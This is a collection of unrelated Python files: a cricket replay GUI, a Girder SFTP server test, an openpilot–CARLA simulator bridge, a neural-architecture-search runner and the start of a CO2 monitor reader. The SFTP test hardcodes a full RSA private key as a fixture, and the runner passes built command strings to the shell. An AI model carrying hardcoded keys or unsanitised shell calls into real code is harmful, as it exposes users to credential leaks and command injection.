print(f"You clicked on play. Speed is {speed}")
frame1 = stream.get(cv2.CAP_PROP_POS_FRAMES)
stream.set(cv2.CAP_PROP_POS_FRAMES, frame1 + speed)
grabbed, frame = stream.read()
if not grabbed:
exit()
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image = PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor=tkinter.NW)
if flag:
canvas.create_text(134, 26, fill="black", font="Times 26 bold", text="Decision Pending")
flag = not flag
def pending(decision):
#Decison Pending Image
frame=cv2.cvtColor(cv2.imread("DecisionPending.png"),cv2.COLOR_BGR2RGB)
frame=imutils.resize(frame,height=SET_HEIGHT,width=SET_WIDTH)
frame=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image=frame
canvas.create_image(0,0,image=frame,anchor=tkinter.NW)
# 2. Wait for 1 second
time.sleep(1.5)
# 3. Display sponsor image
frame = cv2.cvtColor(cv2.imread("Sponsor.png"), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor=tkinter.NW)
# 4. Wait for 1.5 second
time.sleep(2.5)
# 5. Display out/notout image
if decision == 'out':
decisionImg = "OUT!.png"
else:
decisionImg = "NotOut.png"
frame = cv2.cvtColor(cv2.imread(decisionImg), cv2.COLOR_BGR2RGB)
frame = imutils.resize(frame, width=SET_WIDTH, height=SET_HEIGHT)
frame = PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(frame))
canvas.image = frame
canvas.create_image(0,0, image=frame, anchor=tkinter.NW)
def out():
thread=threading.Thread(target=pending,args=("out",))
thread.daemon=1
thread.start()
print("Player is Out!")
def notout():
thread=threading.Thread(target=pending,args=("notout",))
thread.daemon=1
thread.start()
print("Player is Not-Out!")
SET_HEIGHT =500
SET_WIDTH =500
window=tkinter.Tk()
window.title("DD DRS")
cv_img=cv2.cvtColor(cv2.imread("Welcome.png"),cv2.COLOR_BGR2RGB)
canvas=tkinter.Canvas(window,height=SET_HEIGHT,width=SET_WIDTH)
photo=PIL.ImageTk.PhotoImage(image=PIL.Image.fromarray(cv_img))
image_on_canvas=canvas.create_image(0,0,anchor=tkinter.NW,image=photo)
canvas.pack()
btn = tkinter.Button(window, text="<< Previous (fast)", width=50, command=partial(play, -25))
btn.pack()
btn = tkinter.Button(window, text="<< Previous (slow)", width=50, command=partial(play, -2))
btn.pack()
btn = tkinter.Button(window, text="Next (slow) >>", width=50, command=partial(play, 2))
btn.pack()
btn = tkinter.Button(window, text="Next (fast) >>", width=50, command=partial(play, 25))
btn.pack()
btn = tkinter.Button(window, text="Give Out", width=50,command=out)
btn.pack()
btn = tkinter.Button(window, text="Give Not Out", width=50,command=notout)
btn.pack()
window.mainloop() |
sftp_test.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
###############################################################################
# Copyright 2016 Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
import paramiko
import six
import socket
import stat
import threading
from .. import base
from girder.api import sftp
from girder.models.collection import Collection
from girder.models.folder import Folder
from girder.models.upload import Upload
from girder.models.user import User
from six.moves import StringIO
server = None
TEST_PORT = 10551
TEST_KEY = paramiko.RSAKey.from_private_key(StringIO("""-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAwdH5tlaZu52adYvW57DcAFknzOKX8+/axDmQdTcg1HwEOnT2
TMSFGciwUQMmya+0i23ZOUtZQutj8fb66szrBZ7qpIvSG6TRyxGuM6PkfAUcBCHO
TGFzaJPnnvUXC8dlxoUIdBaUCmSblvj2q2CTNy53ybAmiiSpahjvBO16pvjbNn+i
EGucSQn71OTMhoSOWtS/VcJC6JPd6kxSdl1EiESbOrjAdNDKMBnfYCkxPG4ulAqe
y5jpfgQiUC0Q3CoWbj/ybAv73JsFndPcpvI8n5EsXeptuWI4CXSorYOuVwURLuzP
z1PkI4ZsYnSnuQG/GReAZnwVDaVJ/uhYMMs1sQIDAQABAoIBADKOmguFBW7aCntU
8cbX7Fsu5mHcTXS1ASSkO1lH+wlSHCw/bCvUKz/xiIRpRQnhCkBAdCQs0mjRS+3G
1ea/cyKxNFWdnz3UvWCyCPWxb50mHAu74bssxFToF8fv+IX7CkJBW1YkuZMIcUlt
QbKsa1o+hcKXb0YjkAl73YU0iQTaet7B1x1X0qkVPEWWURTg3z65TNI96t8p28dh
4HgEoU0Jtfsfzb7u1H4/m3Q28J1S+cTkER/VIgLzMeYXr2MooIQc3QAMXATpXkhM
y6u0LYh+kW1XD4ZnyzTp49BMf76rS8VhsYN6f+jLhJUf/5O+m8NFGuCq15TFyQAH
vMBxPRECgYEA4+fxYuuOq+SilYpejD4EMwvrClixHOfTojlnAyUaJZSnyVp/Y4l+
QmFmbNpfRKN1fv24e9f9CmA8nd5A3kxBjJFhzaaxbFG+jI47fqOu9NadXPHaxvyq
BI2aHx4sqp/Z/ct/klht5hxD8UFMRFbaaLYAojKg1nL0g/88wwwN9LUCgYEA2bZh
873OGT7sNXHin2rXD5XEYXqjLy51hed4ZdtJXFrKhg8ozWqaOZ79GXustdRanzTV
zDeTweI0hg7adbKyBNeuQF8VSOK6ws2wPPCuUbQTVYaepqPuT+VhzAB1GVJ1uF/T
YxgqXOvg9QwnZ4Fjlv3b/52R89bTP+Yr6GcQdo0CgYAvLQ38igIodtVo2xGjOhso
bekjZSSUdTCLvhIixoVZDiKFPaRs+EMYfozzL2jVDnj95otPp3ALu8wQabdHzMUs
0dNK/JxxbaJh+fc6yasnp10/phjBY//VnXIvytE4KIq5TGyF4KQvI960i+27n7bq
QfJzoMNGYNlYkXcEcPRamQKBgQCVCYWElirAnZKWA6BgAYO3547ILGwJoIRTZmHF
WJif4IdDvpzwAkoRqAUbrM5Oq1BeLI0vf9xmnbPXEdP7PpkfN4bSCkVH3+557NT4
4spypBOYOM/iw9YgW6bXQHjpHMn5rZ/H9oMJmXAmUGupL6o9cwtnsTZ49lcnJypn
riZXAQKBgQCgiJ/A11HX7fUgFzBB9no2Sy1hS3u1Ld35nZf7RDegVoEn/UdWdOxn
H2T9t0EzIoSqkfPRrsqN8sv/TMIohS6frOpBojEvwUs5mxjVwswq/QgBSV2FqYck
VeccLgZzTSMNzCDMbtM+zGG5WktzFojrMIhfD0SM3CB3jECF+Dfdtg==
-----END RSA PRIVATE KEY-----
"""))
def setUpModule():
global server
server = sftp.SftpServer(('localhost', TEST_PORT), TEST_KEY)
serverThread = threading.Thread(target=server.serve_forever)
serverThread.daemon = True
serverThread.start()
def tearDownModule():
if server:
server.shutdown()
server.server_close()
base.dropAllTestDatabases()
class SftpTestCase(base.TestCase):
def testSftpService(self):
users = ({
'email': 'admin@email.com',
'login': 'admin',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
}, {
'email': 'regularuser@email.com',
'login': 'regularuser',
'firstName': 'First',
'lastName': 'Last',
'password': 'passwd'
})
admin, user = [User().createUser(**user) for user in users]
collections = ({
'name': 'public collection',
'public': True,
'creator': admin
}, {
'name': 'private collection',
'public': False,
'creator': admin
})
privateFolder = Folder().findOne({
'parentCollection': 'user',
'parentId': user['_id'],
'name': 'Private'
})
self.assertIsNotNone(privateFolder)
Upload().uploadFromFile(
six.BytesIO(b'hello world'), size=11, name='test.txt', parentType='folder',
parent=privateFolder, user=user)
for coll in collections:
Collection().createCollection(**coll)
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
# Incorrect password should raise authentication error
with self.assertRaises(paramiko.AuthenticationException):
client.connect(
'localhost', TEST_PORT, username='admin', password='badpass', look_for_keys=False,
allow_agent=False)
# Authenticate as admin
client.connect(
'localhost', TEST_PORT, username='admin', password='passwd', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
self.assertEqual(sftpClient.listdir('/'), ['collection', 'user'])
# Listing an invalid top level entity should fail
with self.assertRaises(IOError):
sftpClient.listdir('/foo')
# Test listing of users, collections, and subfolders
self.assertEqual(set(sftpClient.listdir('/user/')), {'admin', 'regularuser'})
self.assertEqual(set(sftpClient.listdir('/user/admin')), {'Public', 'Private'})
self.assertEqual(
set(sftpClient.listdir('/collection')), {'public collection', 'private collection'})
self.assertEqual(sftpClient.listdir('/user/regularuser/Private'), ['test.txt'])
self.assertEqual(sftpClient.listdir('/user/regularuser/Private/test.txt'), ['test.txt'])
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/nonexistent')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private')
# Read a file using small enough buf size to require multiple chunks internally.
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
self.assertEqual(file.read(2), b'he')
self.assertEqual(file.read(), b'llo world')
# Make sure we enforce max buffer length
tmp, sftp.MAX_BUF_LEN = sftp.MAX_BUF_LEN, 2
file = sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r', bufsize=4)
with self.assertRaises(IOError):
file.read()
sftp.MAX_BUF_LEN = tmp
# Test stat capability
info = sftpClient.stat('/user/regularuser/Private')
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
# lstat should also work
info = sftpClient.lstat('/user/regularuser/Private/test.txt/test.txt')
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# File stat implementations should agree
info = file.stat()
self.assertFalse(stat.S_ISDIR(info.st_mode))
self.assertTrue(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_size, 11)
self.assertEqual(info.st_mode & 0o777, 0o777)
# Make sure we can stat the top-level entities
for path in ('/', '/user', '/collection'):
info = sftpClient.stat(path)
self.assertTrue(stat.S_ISDIR(info.st_mode))
self.assertFalse(stat.S_ISREG(info.st_mode))
self.assertEqual(info.st_mode & 0o777, 0o777)
sftpClient.close()
client.close()
# Test that any username other than anonymous will fail using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('')
trans.close()
sock.close()
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
with self.assertRaises(paramiko.ssh_exception.BadAuthenticationType):
trans.auth_none('eponymous')
trans.close()
sock.close()
# Test that a connection can be opened for anonymous access using auth_none.
sock = socket.socket()
sock.connect(('localhost', TEST_PORT))
trans = paramiko.Transport(sock)
trans.connect()
trans.auth_none(username='anonymous')
sftpClient = paramiko.SFTPClient.from_transport(trans)
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
trans.close()
sock.close()
# Test anonymous access
client = paramiko.SSHClient()
client.load_system_host_keys()
client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
client.connect(
'localhost', TEST_PORT, username='anonymous', password='', look_for_keys=False,
allow_agent=False)
sftpClient = client.open_sftp()
# Only public data should be visible
self.assertEqual(set(sftpClient.listdir('/user')), {'admin', 'regularuser'})
self.assertEqual(sftpClient.listdir('/collection'), ['public collection'])
self.assertEqual(sftpClient.listdir('/user/admin'), ['Public'])
# Make sure the client cannot distinguish between a resource that does not exist
# vs. one they simply don't have read access to.
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.listdir('/user/regularuser/Private')
with six.assertRaisesRegex(self, IOError, 'No such file'):
sftpClient.file('/user/regularuser/Private/test.txt/test.txt', 'r')
sftpClient.close()
client.close()
|
bridge.py | #!/usr/bin/env python3
# type: ignore
import carla # pylint: disable=import-error
import time
import math
import atexit
import numpy as np
import threading
import cereal.messaging as messaging
import argparse
from common.params import Params
from common.realtime import Ratekeeper, DT_DMON
from lib.can import can_function
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--town', type=str, default='Town04')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point',
type=int, default=16)
parser.add_argument('--cloudyness', default=0.1, type=float)
parser.add_argument('--precipitation', default=0.0, type=float)
parser.add_argument('--precipitation_deposits', default=0.0, type=float)
parser.add_argument('--wind_intensity', default=0.0, type=float)
parser.add_argument('--sun_azimuth_angle', default=15.0, type=float)
parser.add_argument('--sun_altitude_angle', default=75.0, type=float)
args = parser.parse_args()
W, H = 1164, 874
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
pm = messaging.PubMaster(['roadCameraState', 'sensorEvents', 'can'])
sm = messaging.SubMaster(['carControl','controlsState'])
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.cruise_button= 0
self.is_engaged=False
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
frame_id = 0
def cam_callback(image):
global frame_id
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
dat = messaging.new_message('roadCameraState')
dat.roadCameraState = {
"frameId": image.frame,
"image": img.tostring(),
"transform": [1.0, 0.0, 0.0, 0.0, 1.0, 0.0, 0.0, 0.0, 1.0]
}
pm.send('roadCameraState', dat)
frame_id += 1
def imu_callback(imu):
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function():
pm = messaging.PubMaster(['pandaState'])
while 1:
dat = messaging.new_message('pandaState')
dat.valid = True
dat.pandaState = {
'ignitionLine': True,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaState', dat)
time.sleep(0.5)
def fake_gps():
# TODO: read GPS from CARLA
pm = messaging.PubMaster(['gpsLocationExternal'])
while 1:
dat = messaging.new_message('gpsLocationExternal')
pm.send('gpsLocationExternal', dat)
time.sleep(0.01)
def fake_driver_monitoring():
pm = messaging.PubMaster(['driverState','driverMonitoringState'])
while 1:
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
"isRHDDEPRECATED": False,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs):
i = 0
while 1:
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i+=1
def go(q):
# setup CARLA
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(10.0)
world = client.load_world(args.town)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[0]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > args.num_selected_spawn_point, \
f'''No spawn point {args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[args.num_selected_spawn_point]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', '70')
blueprint.set_attribute('sensor_tick', '0.05')
transform = carla.Transform(carla.Location(x=0.8, z=1.45))
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(cam_callback)
world.set_weather(carla.WeatherParameters(
cloudyness=args.cloudyness,
precipitation=args.precipitation,
precipitation_deposits=args.precipitation_deposits,
wind_intensity=args.wind_intensity,
sun_azimuth_angle=args.sun_azimuth_angle,
sun_altitude_angle=args.sun_altitude_angle
))
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(imu_callback)
def destroy():
print("clean exit")
imu.destroy()
camera.destroy()
vehicle.destroy()
print("done")
atexit.register(destroy)
vehicle_state = VehicleState()
# launch fake car threads
threading.Thread(target=panda_state_function).start()
threading.Thread(target=fake_driver_monitoring).start()
threading.Thread(target=fake_gps).start()
threading.Thread(target=can_function_runner, args=(vehicle_state,)).start()
# can loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
old_steer = old_brake = old_throttle = 0
throttle_manual_multiplier = 0.7 #keyboard signal is always 1
brake_manual_multiplier = 0.7 #keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO #keyboard signal is always 1
while 1:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
if m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
if m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
if m[0] == "reverse":
#in_reverse = not in_reverse
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
if m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
if m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
if m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
#steer_out = steer_out
# steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
# print('message',old_throttle, old_steer, old_brake)
if is_openpilot_engaged:
sm.update(0)
throttle_op = sm['carControl'].actuators.gas #[0,1]
brake_op = sm['carControl'].actuators.brake #[0,1]
steer_op = sm['controlsState'].angleSteersDes # degrees [-180,180]
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
# OP Exit conditions
# if throttle_out > 0.3:
# cruise_button = CruiseButtons.CANCEL
# is_openpilot_engaged = False
# if brake_out > 0.3:
# cruise_button = CruiseButtons.CANCEL
# is_openpilot_engaged = False
# if steer_out > 0.3:
# cruise_button = CruiseButtons.CANCEL
# is_openpilot_engaged = False
else:
if throttle_out==0 and old_throttle>0:
if throttle_ease_out_counter>0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out==0 and old_brake>0:
if brake_ease_out_counter>0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out==0 and old_steer!=0:
if steer_ease_out_counter>0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1,1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out/0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x**2 + vel.y**2 + vel.z**2) # in m/s
vehicle_state.speed = speed
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
if rk.frame%PRINT_DECIMATION == 0:
print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ", round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
rk.keep_time()
if __name__ == "__main__":
# make sure params are in a good state
params = Params()
params.clear_all()
set_params_enabled()
params.delete("Offroad_ConnectivityNeeded")
params.put("CalibrationParams", '{"calib_radians": [0,0,0], "valid_blocks": 20}')
from multiprocessing import Process, Queue
q = Queue()
p = Process(target=go, args=(q,))
p.daemon = True
p.start()
if args.joystick:
# start input poll for joystick
from lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
|
run_derive_ckpts.py | # pylint: disable=invalid-name,missing-docstring,redefined-outer-name
# -- coding: utf-8 -*-
import os
import copy
import argparse
import subprocess
import multiprocessing
from io import StringIO
import yaml
GPUs = [0, 1, 2, 3]
_HOME_DIR = os.path.abspath(os.path.expanduser(os.environ.get("AWNAS_HOME", "~/awnas")))
parser = argparse.ArgumentParser()
parser.add_argument("--cfg-file", default=None)
parser.add_argument("--gpus", default=None)
parser.add_argument(
"--cfg-ckpt-rel-path",
default=None,
help="The relative path of cfg file to ckpt dir",
)
parser.add_argument("--arch-file", default=None)
parser.add_argument(
"--arch-file-ckpt-rel-path",
default=None,
help="The relative path of arch file to ckpt dir",
)
parser.add_argument("--result-dir", required=True)
parser.add_argument("--single-result-file", default=None)
parser.add_argument(
"--subset",
default=False,
action="store_true",
help="Only applicable when using derive (nb201)",
)
parser.add_argument(
"--addi-controller-cfgs",
default="",
help="Add controller cfgs by yaml dict, " "Only relevant when using derive (nb201)",
)
parser.add_argument(
"--iso",
default=False,
action="store_true",
help="Only applicable when using derive (nb201)",
)
args, ckpts = parser.parse_known_args()
if args.gpus:
GPUs = [int(gpu) for gpu in args.gpus.split(",")]
ckpts = [os.path.abspath(ckpt) for ckpt in ckpts]
def get_arch_files(ckpts, arch_file, rel_path):
assert arch_file is not None or rel_path is not None, (
"Use `eval-arch` for Nasbench-301/101, should provide --arch-file or"
" --arch-file-ckpt-rel-path"
)
if not rel_path:
arch_files = [arch_file] * len(ckpts)
else:
arch_files = [os.path.join(ckpt, rel_path) for ckpt in ckpts]
return arch_files
arch_files = [None] * len(ckpts)
assert (
args.cfg_file is not None or args.cfg_ckpt_rel_path is not None
), "Should provide --cfg-file or --cfg-ckpt-rel-path"
if args.addi_controller_cfgs:
addi_controller_cfgs = yaml.load(StringIO(args.addi_controller_cfgs))
else:
addi_controller_cfgs = None
if not args.cfg_ckpt_rel_path:
with open(args.cfg_file, "r") as r_f:
eval_or_derive_cfg = yaml.load(r_f)
call_derive = False # call derive or eval_arch
derive_cfg_file = args.cfg_file
if eval_or_derive_cfg["search_space_type"] == "nasbench-201":
call_derive = True
if addi_controller_cfgs:
derive_cfg = copy.deepcopy(eval_or_derive_cfg)
derive_cfg["controller_cfg"].update(addi_controller_cfgs)
derive_cfg_file = "{}_derive.yaml".format(args.cfg_file.rsplit(".", 1)[0])
with open(derive_cfg_file, "w") as wf:
yaml.dump(derive_cfg, wf)
else:
derive_cfg = eval_or_derive_cfg
if args.subset:
if derive_cfg["controller_cfg"]["text_file"]:
with open(derive_cfg["controller_cfg"]["text_file"], "r") as rf2:
arch_num = len(rf2.read().strip().split("\n"))
else:
arch_num = 15625 if args.iso else 6466
else:
# derive 6466 or 15625
if not args.iso:
derive_cfg["controller_cfg"]["text_file"] = os.path.join(
_HOME_DIR, "awnas/data/nasbench-201/non-isom.txt"
)
arch_num = 6466
else:
derive_cfg["controller_cfg"]["text_file"] = os.path.join(
_HOME_DIR, "awnas/data/nasbench-201/iso.txt"
)
arch_num = 15625
else:
arch_num = None # call eval-arch would not be used (nb301/101)
cfg_files = [derive_cfg_file] * len(ckpts)
num_archs = [arch_num] * len(ckpts)
call_derives = [call_derive] * len(ckpts)
else:
cfg_files = []
call_derives = []
num_archs = []
for ckpt in ckpts:
cfg_file = os.path.join(ckpt, args.cfg_ckpt_rel_path)
derive_cfg_file = cfg_file
arch_num = None
with open(cfg_file, "r") as r_f:
eval_or_derive_cfg = yaml.load(r_f)
call_derive = False # call derive or eval_arch
if eval_or_derive_cfg["search_space_type"] == "nasbench-201":
call_derive = True
if args.addi_controller_cfgs:
derive_cfg = copy.deepcopy(eval_or_derive_cfg)
derive_cfg["controller_cfg"].update(
yaml.load(StringIO(args.addi_controller_cfgs))
)
derive_cfg_file = "{}_derive.yaml".format(cfg_file.rsplit(".", 1)[0])
with open(derive_cfg_file, "w") as wf:
yaml.dump(derive_cfg, wf)
else:
derive_cfg = eval_or_derive_cfg
if args.subset:
if derive_cfg["controller_cfg"]["text_file"]:
with open(derive_cfg["controller_cfg"]["text_file"], "r") as rf2:
arch_num = len(rf2.read().strip().split("\n"))
else:
arch_num = 15625 if args.iso else 6466
else:
# derive 6466 or 15625
if not args.iso:
derive_cfg["controller_cfg"]["text_file"] = os.path.join(
_HOME_DIR, "awnas/data/nasbench-201/non-isom.txt"
)
arch_num = 6466
else:
derive_cfg["controller_cfg"]["text_file"] = os.path.join(
_HOME_DIR, "awnas/data/nasbench-201/iso.txt"
)
arch_num = 15625
cfg_files.append(derive_cfg_file)
num_archs.append(arch_num)
call_derives.append(call_derive)
if not all(call_derives):
# has nb301/101, need call eval-arch
arch_files = get_arch_files(ckpts, args.arch_file, args.arch_file_ckpt_rel_path)
# ---- result paths ----
if len(ckpts) > 1:
assert args.single_result_file is None
common_path = os.path.commonpath(ckpts)
res_files = [
os.path.relpath(ckpt, common_path).strip("/") + (".yaml" if call_derive else ".pkl")
for ckpt, call_derive in zip(ckpts, call_derives)
]
else:
assert args.single_result_file is not None
res_files = [args.single_result_file]
os.makedirs(args.result_dir, exist_ok=True)
for res_file in res_files:
if "/" in res_file:
os.makedirs(
os.path.join(args.result_dir, res_file.rsplit("/", 1)[0]), exist_ok=True
)
print("Would save to:", res_files)
num_processes = len(GPUs)
queue = multiprocessing.Queue(maxsize=num_processes)
def _worker(p_id, gpu_id, queue):
while 1:
token = queue.get()
if token is None:
break
# ckpt_dir, res_file = token
cfg_file, ckpt_dir, res_file, num_arch, call_derive, arch_file = token
out_file = os.path.join(args.result_dir, res_file)
derive_log = out_file.replace(".yaml", ".log").replace(".pkl", ".log")
if call_derive:
# call derive
cmd = (
"awnas derive {} --load {} --out-file {} --gpu {} -n {} --test --seed 123 "
"--runtime-save >{} 2>&1"
).format(cfg_file, ckpt_dir, out_file, gpu_id, num_arch, derive_log)
else:
# call eval-arch
cmd = (
"awnas eval-arch {} {} --load {} --dump-rollouts {} --gpu {} --seed 123 "
">{} 2>&1"
).format(cfg_file, arch_file, ckpt_dir, out_file, gpu_id, derive_log)
print("Process #{}: ckpt {}; CMD: {}".format(p_id, ckpt_dir, cmd))
subprocess.check_call(cmd, shell=True)
print("Process #{} end".format(p_id))
for p_id in range(num_processes):
p = multiprocessing.Process(target=_worker, args=(p_id, GPUs[p_id], queue))
p.start()
for cfg_file, ckpt, res_file, num_arch, call_derive, arch_file in zip(
cfg_files, ckpts, res_files, num_archs, call_derives, arch_files
):
queue.put((cfg_file, ckpt, res_file, num_arch, call_derive, arch_file))
# close all the workers
for _ in range(num_processes):
queue.put(None)
|
co2meter.py | """ Class for reading data from CO2 monitor.
(c) Vladimir Filimonov, 2016-2018
E-mail: vladimir.a.filimonov@gmail.com
"""
try:
import hid
except AttributeError as e:
if 'windll' in e.message:
raise ImportError(('Import failed with an error "AttributeError: %s". '
'Possibly there''s a name conflict. Please check if '
